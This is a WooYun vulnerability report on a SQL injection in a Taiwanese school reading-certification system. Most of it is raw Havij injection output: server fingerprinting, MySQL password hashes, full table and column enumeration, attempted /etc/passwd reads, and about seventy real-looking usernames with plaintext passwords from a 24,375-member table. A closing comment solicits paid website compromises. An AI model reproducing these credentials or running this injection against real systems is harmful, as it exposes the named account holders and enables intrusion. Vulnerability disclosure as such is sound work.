当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164824

漏洞标题:台灣校園閱讀線上認證系統SQL注射導致2W多人的信息洩露(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 雅柏菲卡

提交时间:2015-12-28 15:19

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

8

详细说明:

放出胡蘿蔔的有關記錄吧
Target: 		http://**.**.**.**/reading_certificate/bulletin_view.php?bulletin_view=249
Host IP:		**.**.**.**
Web Server: 	Apache/2.2.3 (CentOS)
Powered-by: 	PHP/5.1.6
DB Server: 	MySQL >=5
Resp. Time(avg):	710 ms
Current User: 	ljc0224@**.**.**.**
Sql Version: 	5.1.73-log
Current DB: 	reading_certificate
System User: 	ljc0224@**.**.**.**
Host Name: 	centos67
Installation dir: 	/usr/
DB User & Pass: 	root:*D077DD478BF23CE6568EA238FE85ACA464528F1C:localhost
		root::centos67
		root::**.**.**.**
		::localhost
Compile OS: 	redhat-linux-gnu
		::centos67
		ljc0224:*D077DD478BF23CE6568EA238FE85ACA464528F1C:**.**.**.**
Data Bases: 	information_schema
		mysql
		reading_certificate
		reading_in_tc
		social_studies
		test
Havij 1.16 Pro!
You haven't registered yet! Please register to use all Pro features
Analyzing http://**.**.**.**/reading_certificate/bulletin_view.php?bulletin_view=249 with 1 input parameter(s)
Test parameter: bulletin_view
Host IP: **.**.**.**
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
Keyword Found: ?O?????F???a??|???104?~??u?C?Ce???
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 13
Valid String Column is 4
Current DB: reading_certificate
Current User: 	ljc0224@**.**.**.**
Sql Version: 	5.1.73-log
Current DB: 	reading_certificate
System User: 	ljc0224@**.**.**.**
Host Name: 	centos67
Installation dir: 	/usr/
Db User & Pass: root:*D077DD478BF23CE6568EA238FE85ACA464528F1C:localhost
Db User & Pass: root::centos67
Db User & Pass: root::**.**.**.**
Db User & Pass: ::localhost
Compile OS: 	redhat-linux-gnu
Db User & Pass: ::centos67
Db User & Pass: ljc0224:*D077DD478BF23CE6568EA238FE85ACA464528F1C:**.**.**.**
Data Base Found: information_schema
Data Base Found: mysql
Data Base Found: reading_certificate
Data Base Found: reading_in_tc
Data Base Found: social_studies
Data Base Found: test
Count(table_name) of information_schema.tables where table_schema=0x72656164696E675F6365727469666963617465 is 77
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x72656164696E675F6365727469666963617465 is 77
Table found: back_home
Table found: blog
Table found: book
Table found: book_index
Table found: book_index_list
Table found: book_mark
Table found: book_school
Table found: bookmarks
Table found: books_school
Table found: bookshelf
Table found: bookshelf_list
Table found: bulletin
Table found: bulletin_game
Table found: certificate_data
Table found: certificate_data_100
Table found: certificate_data_101
Table found: certificate_data_102
Table found: certificate_data_103
Table found: certificate_data_96
Table found: certificate_data_97
Table found: certificate_data_98
Table found: certificate_data_99
Table found: certificate_member
Table found: certificate_member_1000220
Table found: certificate_member_1000806
Table found: certificate_member_1000831
Table found: certificate_member_1010812
Table found: certificate_member_1010903
Table found: certificate_member_1011109
Table found: certificate_member_1020803
Table found: certificate_member_1020902
Table found: certificate_member_1030606
Table found: certificate_member_1030805
Table found: certificate_member_1030901
Table found: certificate_member_1040916
Table found: certificate_member_1040922
Table found: certificate_member_1041023
Table found: certificate_member_990705
Table found: certificate_member_990819
Table found: certificate_member_990831
Table found: documents
Table found: documents_file
Table found: fly101
Table found: fly101_unselected
Table found: game_97
Table found: game_97_graphic
Table found: game_97_question
Table found: game_97_supervisor
Table found: game_98
Table found: game_98_graphic
Table found: game_98_question
Table found: game_98_supervisor
Table found: guest
Table found: guestbook
Table found: guestbook_game
Table found: label
Table found: lucky
Table found: member
Table found: member_981104bak
Table found: member_grade
Table found: online_counter
Table found: question
Table found: question_advance
Table found: question_advance_backup
Table found: question_advance_backup_98
Table found: question_advance_mark
Table found: questionnaire
Table found: questionnaire_1001228_s
Table found: questionnaire_1001228_t
Table found: school_county
Table found: school_data
Table found: school_data_bak
Table found: school_town
Table found: statistics
Table found: top_score
Table found: visitors
Table found: weblink
Count(column_name) of information_schema.columns where table_schema=0x72656164696E675F6365727469666963617465 and table_name=0x63657274696669636174655F6D656D626572 is 69
Column found: id
Column found: mark
Column found: sch_id
Column found: sch_year
Column found: graduate
Column found: stu_grade
Column found: up_grade
Column found: stu_class
Column found: up_class
Column found: stu_no
Column found: up_no
Column found: stu_username
Column found: super_username
Column found: stu_username_old
Column found: stu_realname
Column found: stu_nickname
Column found: photo_filename
Column found: lucky_number
Column found: lucky_number_1
Column found: passwd
Column found: login_date
Column found: confirmer
Column found: confirm_date
Column found: stoper
Column found: stop_date
Column found: stop_day
Column found: stop_reason
Column found: last_login_date
Column found: visited
Column found: score
Column found: Extra_Credits
Column found: bird_degree
Column found: modifyer
Column found: modify_date
Column found: memo
Column found: from_sch_id
Column found: tctax_books
Column found: tctax_prizes
Column found: tctax_got_it
Column found: sys_p_8
Column found: sys_p_7
Column found: sys_p_6
Column found: sch_p_8
Column found: sch_p_7
Column found: sch_p_6
Column found: sch_p_5
Column found: sch_p_4
Column found: sch_p_3
Column found: sch_p_2
Column found: sch_p_1
Column found: sys_book
Column found: tctax_101_books
Column found: tctax_101_prizes
Column found: tctax_101_got_it
Column found: e_river_books
Column found: e_river_prizes
Column found: e_river_got_it
Column found: tctax_102_books
Column found: tctax_102_prizes
Column found: tctax_102_got_it
Column found: tctax_103_books
Column found: tctax_103_prizes
Column found: tctax_103_got_it
Column found: tctax_103_2_books
Column found: tctax_103_2_prizes
Column found: tctax_103_2_got_it
Column found: tctax_104_books
Column found: tctax_104_prizes
Column found: tctax_104_got_it
Count(column_name) of information_schema.columns where table_schema=0x72656164696E675F6365727469666963617465 and table_name=0x6D656D626572 is 32
Column found: id
Column found: mark
Column found: username
Column found: passwd
Column found: realname
Column found: nickname
Column found: email
Column found: sch_id
Column found: class_teacher
Column found: teach_grade
Column found: teach_class
Column found: login_date
Column found: last_login_date
Column found: visited
Column found: group_id_suggest
Column found: group_id
Column found: group_confirmer
Column found: group_confirmer_date
Column found: photo_filename
Column found: score
Column found: score_use
Column found: score_sum
Column found: tree_degree
Column found: message
Column found: message_sender
Column found: message_datetime
Column found: message_read_datetime
Column found: advance
Column found: professor
Column found: fly101
Column found: chinese
Column found: english
Count(*) of reading_certificate.member is 24375
Data Found: id=1
Data Found: username=luc0418
Data Found: passwd=03280328
Data Found: id=3
Data Found: username=lw12
Data Found: passwd=ol9801
Data Found: id=6
Data Found: username=ljc0224
Data Found: passwd=ol9801
Data Found: id=10
Data Found: username=tcptes103
Data Found: passwd=ptes4950
Data Found: id=11
Data Found: username=allenyeh
Data Found: passwd=allenying
Data Found: id=12
Data Found: username=tittle
Data Found: passwd=heh996
Data Found: id=13
Data Found: username=jason0816
Data Found: passwd=master
Data Found: id=14
Data Found: username=poshan
Data Found: passwd=zhq6vb9
Data Found: id=15
Data Found: username=chiacl
Data Found: passwd=1234
Data Found: id=16
Data Found: username=civy
Data Found: passwd=24923425
Data Found: id=17
Data Found: username=showhui
Data Found: passwd=susan9104
Data Found: id=20
Data Found: username=dlw31
Data Found: passwd=dqkdyo
Data Found: id=21
Data Found: username=zpes
Data Found: passwd=24792122
Data Found: id=23
Data Found: username=nophia
Data Found: passwd=842124
Data Found: id=26
Data Found: username=linmh
Data Found: passwd=221052
Data Found: id=27
Data Found: username=chenct
Data Found: passwd=chenct
Data Found: id=28
Data Found: username=butterfy01
Data Found: passwd=7324
Data Found: id=29
Data Found: username=huangch
Data Found: passwd=huangch3072
Data Found: id=30
Data Found: username=chiangwc
Data Found: passwd=121309
Data Found: id=31
Data Found: username=flower5
Data Found: passwd=15204077
Data Found: id=32
Data Found: username=leefc
Data Found: passwd=220130
Data Found: id=34
Data Found: username=huangyc
Data Found: passwd=221317
Data Found: id=36
Data Found: username=ptes-034
Data Found: passwd=291826
Data Found: id=37
Data Found: username=liaoac
Data Found: passwd=22322361
Data Found: id=39
Data Found: username=hunme
Data Found: passwd=391040
Data Found: id=42
Data Found: username=ptes-041
Data Found: passwd=22378885
Data Found: id=43
Data Found: username=chenyl
Data Found: passwd=yuli7492
Data Found: id=45
Turning off 'bypass illegal union' and retrying!
Data Found: username=?_???D??
Data Found: passwd=1234
Data Found: id=46
Data Found: username=ptes-055
Data Found: passwd=000000
Data Found: id=47
Data Found: username=leefc1
Data Found: passwd=220130
Data Found: id=48
Data Found: username=tingwj
Data Found: passwd=220341
Data Found: id=49
Data Found: username=linlc
Data Found: passwd=702321
Data Found: id=50
Data Found: username=chentt
Data Found: passwd=122269
Data Found: id=51
Data Found: username=tsaish
Data Found: passwd=222694
Data Found: id=52
Data Found: username=lina
Data Found: passwd=221335
Data Found: id=56
Data Found: username=chenwl
Data Found: passwd=000000
Data Found: id=57
Data Found: username=yanghc
Data Found: passwd=221108
Data Found: id=59
Data Found: username=chenll
Data Found: passwd=220105
Data Found: id=60
Data Found: username=ysyschou
Data Found: passwd=#3278929#
Data Found: id=61
Data Found: username=huangwc
Data Found: passwd=122474
Data Found: id=62
Data Found: username=lucyang
Data Found: passwd=221341
Data Found: id=63
Data Found: username=ptes-093
Data Found: passwd=703855
Data Found: id=64
Data Found: username=huanghl
Data Found: passwd=972827
Data Found: id=65
Data Found: username=hucw
Data Found: passwd=220787
Data Found: id=67
Data Found: username=yangyf
Data Found: passwd=372354
Data Found: id=69
Data Found: username=lintl
Data Found: passwd=224173
Data Found: id=70
Data Found: username=kent
Data Found: passwd=zpes425
Data Found: id=72
Data Found: username=huangsh
Data Found: passwd=237900
Data Found: id=76
Data Found: username=dpes0005
Data Found: passwd=ikriou
Data Found: id=79
Data Found: username=linsc
Data Found: passwd=24362260
Data Found: id=88
Data Found: username=liuhm
Data Found: passwd=222200
Data Found: id=92
Data Found: username=chumt
Data Found: passwd=222882
Data Found: id=93
Data Found: username=shuer
Data Found: passwd=5757
Data Found: id=94
Data Found: username=shuying
Data Found: passwd=220954
Data Found: id=96
Data Found: username=yanghh
Data Found: passwd=000000
Data Found: id=98
Data Found: username=hsupf
Data Found: passwd=1207
Data Found: id=101
Data Found: username=sindia
Data Found: passwd=7777
Data Found: id=102
Data Found: username=ujay
Data Found: passwd=ujay89
Data Found: id=104
Data Found: username=paper1113
Data Found: passwd=paper1113
Data Found: id=105
Data Found: username=hurnfang
Data Found: passwd=672345
Data Found: id=106
Data Found: username=like
Data Found: passwd=221954
Data Found: id=107
Data Found: username=liic
Data Found: passwd=121301
Data Found: id=108
Data Found: username=ptes-052
Data Found: passwd=004585
Data Found: id=109
Data Found: username=ohgi
Data Found: passwd=0708
Data Found: id=110
Data Found: username=htone
Data Found: passwd=ng0418
Data Found: id=111
Data Found: username=chinyen
Data Found: passwd=874216
Data Found: id=112
Data Found: username=ptes-025
Data Found: passwd=616706
Canceling...
Job Canceled!
Reading file: /etc/passwd
Reading file: C:\boot.ini
Count(table_name) of information_schema.tables where table_schema=0x736F6369616C5F73747564696573 is 0
It seems information_schema table does not exist! Trying to guess tables!
Guessing table(5/686): users
Canceling...
Total tables found: 0
Job Canceled!
Count(table_name) of information_schema.tables where table_schema=0x72656164696E675F696E5F7463 is 27
Table found: activity_report
Table found: activity_report_document
Table found: activity_report_photo
Table found: activity_report_weblink
Table found: bulletin
Table found: bulletin_activity
Table found: document_manager_document
Table found: document_manager_index
Table found: document_manager_photo
Table found: document_manager_weblink
Table found: document_share_document
Table found: document_share_index
Table found: document_share_photo
Table found: document_share_weblink
Table found: honor_school
Table found: honor_school_document
Table found: honor_school_photo
Table found: honor_school_weblink
Table found: honor_teacher
Table found: honor_teacher_document
Table found: honor_teacher_photo
Table found: honor_teacher_weblink
Table found: online_counter
Table found: school_weblink
Table found: social_resources
Table found: social_resources_index
Table found: visitors
Count(*) of reading_certificate.member is 24375

漏洞证明:

QQ20151228-0@2x.png

修复方案:

..............................

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-28 17:59

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-22 05:50 | 子非鱼 ( 实习白帽子 | Rank:31 漏洞数:14 )

    请问大牛要赚些外快吗,拿些简单的站,都是权重站或者新闻源,请加我QQ 123822416 谈